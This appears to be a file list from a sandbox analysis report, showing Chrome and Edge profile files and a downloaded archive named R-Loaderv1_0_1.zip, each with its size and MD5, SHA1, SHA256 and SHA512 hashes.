C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1fbd7f7d4ea9623e3d217b01dcf6b33a

SHA1
844d813a9928eb432de7e5fe6ad4786a787495f3

SHA256
23d2e36081a0f3753d85154415edd9e62f49e5e3acc192a9194eaf24650d8b7e

SHA512
baa9c369e005bc1e38117cfa6fde67f03f7511b7509e1c3e819b0d07f8380dd75930bb7db9e4be411b3d02cf72348501141e0cfe75c401148d94b1667ed67dfd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
70f29a7b7d2015652057566d76036472

SHA1
68dc42fa745ffaa5c771a8c8eaaab00ab9d98f3d

SHA256
33c5ea2432f40ffce13b3e325ad4ffa07a7408e40474ffb65c45572755ad2958

SHA512
aefaf0c720243be6ad280383be74771565fe14bb4e4f19ab4b09432e3e239c765d4e9f02c8ded72cc5240fe25b01efa019c6fc91e236ea7ab0ba2f561101182e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
109KB

MD5
aa73ef3d5d2fa134c2ce2603f2cede17

SHA1
ac97acbe9a9a193dda23996a49e525bcb4f15f52

SHA256
362bca034be257d99fc73154b2064ff3b19c9ddec890d87847a374eb6bf50ed0

SHA512
2d84940919a4df0e98798c909045ba27ccac99d65c9b125dde7291c0922c048fec93b70e79b9783067763384f3d0fa657370b4251d723751ed7ccb6877d17c19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
219KB

MD5
ad1cc254b2c863b978c00963910df166

SHA1
83140c2f867ebbeaee5654da1ae4b1f9a975ee3b

SHA256
d7c18f4334d5072434480a293cb33783ccff6ac280fef5f8ee650a8b5cdac75e

SHA512
de738f364d3a274624b0ff8e85cdf5e09d768c976dedeb0eea1bd3933efe7301f74e051215bdb758cd563e8cd247395f964aad30740bc096294094d84fe770f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
483924abaaa7ce1345acd8547cfe77f4

SHA1
4190d880b95d9506385087d6c2f5434f0e9f63e8

SHA256
9a111c2b76c1b5f6d4f702502b9ff4326b7b5682921c2760286dd073824cb684

SHA512
e4ac0a0d5f06e056901c68488e34358a32a5bc7aeffcd82af7eba6043d0fa35eaa67a67c3716dcb661aaca441677819bcba7d35bc4efc6103f3ce32f78e32310

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
265B

MD5
f5cd008cf465804d0e6f39a8d81f9a2d

SHA1
6b2907356472ed4a719e5675cc08969f30adc855

SHA256
fcea95cc39dc6c2a925f5aed739dbedaa405ee4ce127f535fcf1c751b2b8fb5d

SHA512
dc97034546a4c94bdaa6f644b5cfd1e477209de9a03a5b02a360c254a406c1d647d6f90860f385e27387b35631c41f0886cb543ede9116436941b9af6cd3285d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
f912b9f90e0cd3bd592b6aed710d910d

SHA1
f7165f3f7bdde9a5b2d26d6e0ba0cc0233e07d1f

SHA256
16240ea49a4db4399895d26f4083fcba1bbf6bc7e27b787eaf3650511dec0da4

SHA512
daa2fe6d14ea360d291e66469bd184ecbd99d13da6c1e65cab7fca68b00c8dc1eeafe2b1759e1d61296813d42b3625f0729e3c0583fa153980fd817edf86a54a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
0c3d9b96ec5abd9714529a7bf2de86c6

SHA1
cfc8e2443ecca9e3b3e8e7f17e7714910611e683

SHA256
8b59241b3df5f912945dfe2625514b27d7dc2dc124208b2eaf4794c145d00dd5

SHA512
e41722f292e2291810569d3a285b7aad650d277a71978e0b7c1db6e7e9f28202b64aab274bd68a04c6d66815d6a88c181b21412feec24d8eeb70db180b20fa8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
10f4666117de737e4c7b04bfbcbc5abd

SHA1
13600dc24e21071ebddcda8d994b92bc3d51e9e9

SHA256
70b153066a527d3909fb03207ffcfce03668272e0667d1445cb4b28bf459284a

SHA512
4cc90a7975c28cad0e352dc057311f0e92579d6d22cddec8bba86665a502e47d23da3a401108dc87e330f3b7c01f250ef8bdf4755e7056dd0547290a4c0567ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
1c706d53e85fb5321a8396d197051531

SHA1
0d92aa8524fb1d47e7ee5d614e58a398c06141a4

SHA256
80c44553381f37e930f1c82a1dc2e77acd7b955ec0dc99d090d5bd6b32c3c932

SHA512
d43867392c553d4afffa45a1b87a74e819964011fb1226ee54e23a98fc63ca80e266730cec6796a2afa435b1ea28aed72c55eae1ae5d31ec778f53be3e2162fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
203B

MD5
9968c8335b59043a025d9036a3691ebd

SHA1
80d0f4ac8d669e9001ae7fb79251a3b4f05e2cd4

SHA256
bffeadbaab42ad3623d0eb2916a25fb541ccda60564bb1c583e880ac8d24261f

SHA512
4e63a1bce5fa8d9aa6188f6c1ccbcc98f6bee09a19295ccf833309350824a9b4931ce7d8130debaa3351f1e3bc637aefb7c8326c15c116a366e2cb175a1d52ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe583b2f.TMP

Filesize
203B

MD5
c0dc479b955af9e3e297658336a565cc

SHA1
07a276a762bfcabe4df000d3128eb88bb33b1c46

SHA256
5917ef118d717802d68c248c67036358f8135885b5cadd7db27928946962b1d0

SHA512
1cda236ad940414fc1be3dace962307306711b7d45ddefaad34f72b76752eac6bd50f71dda0c76dc4fbdc38a23a787af3e649a4f346251b413782e7d5f9f39de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b343005a-104a-4105-a88e-8b64e9f6cc5f.tmp

Filesize
5KB

MD5
170b982c602b77282028ba3412c01de7

SHA1
1d0de86e14de43dcd1eb098c64df742db12b2135

SHA256
157413cd7fe1b7e5feae47d71c5ae7e4f6aa3174d48178df9fc432612b7b6872

SHA512
dc077f38399b37cca14c1e1ba5dfef4ce57bd50e2d1f2c27cf9437f1f85f31e41321084a8d6e63650d943857c6e5b6b92f798718a408fe94484555c2e6e47d21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
12f780c9a5040a5abff84ebb964cdea2

SHA1
b42fda656fce5e95175bfbdb322b4e96d6c1e585

SHA256
86fa8926c5dbff9cb1cdf6eadbd560c6f1d58172f86170be7df70b4089dbfa3b

SHA512
5540c87461177fa7fa94376055c85a3da2830121a837b2ca78c4bb867aead02fdc575a968768939b7e935ff059bfd48301db51575c2257cea16f550a5cac2ecb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c20936d609339a426c55d1ba1c29efb8

SHA1
949fb0f6db4e86731bdcbd15d81eced7cd972223

SHA256
c3d4207a4db911f669d1b8ec10b9fb78f2f1f039a50e9662d01941b81d955242

SHA512
6861df80c466233510e46f7023de23137cf32fe0eec62e61e790d468a068692da996c596c3ff23709a6849d084b32ccf3509fc21cd682135561e6930b776e039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
4a12b31913e1c299659667ed55c7b7c6

SHA1
d767411986834a06e4fa21cd1718bfe49d239559

SHA256
9290494d44ea72ab3d11c6a72971f81f7856c595c00a4590aab93505607306fe

SHA512
a0834eb6bae55bbcd26a924e6ad1ab4058e235034ed0a8a99d6fd60f227a3abea0bcf4e7a8201d8459d1772502f1a6b7f920e7626f7c9b009d6d056bf74f5bfa

Download Submit
C:\Users\Admin\Downloads\R-Loaderv1_0_1.zip

Filesize
10.6MB

MD5
60e508f2429de17e1219bd835bae5450

SHA1
48029d1f92896a028dbca67a5313b28615c5331c

SHA256
146ee5655bb008672357ca94781fa7b50b546cfde8efffe0e1c95357cf07aad3

SHA512
70ffe0d265d188c0e8d6ae3445445b77a96b56a823bfc79ddfe8b47ef0088a0f0b25f2f1d4bc59f8ea05b8f32c210958bea344daa4f9671a49166fac30653984

Download Submit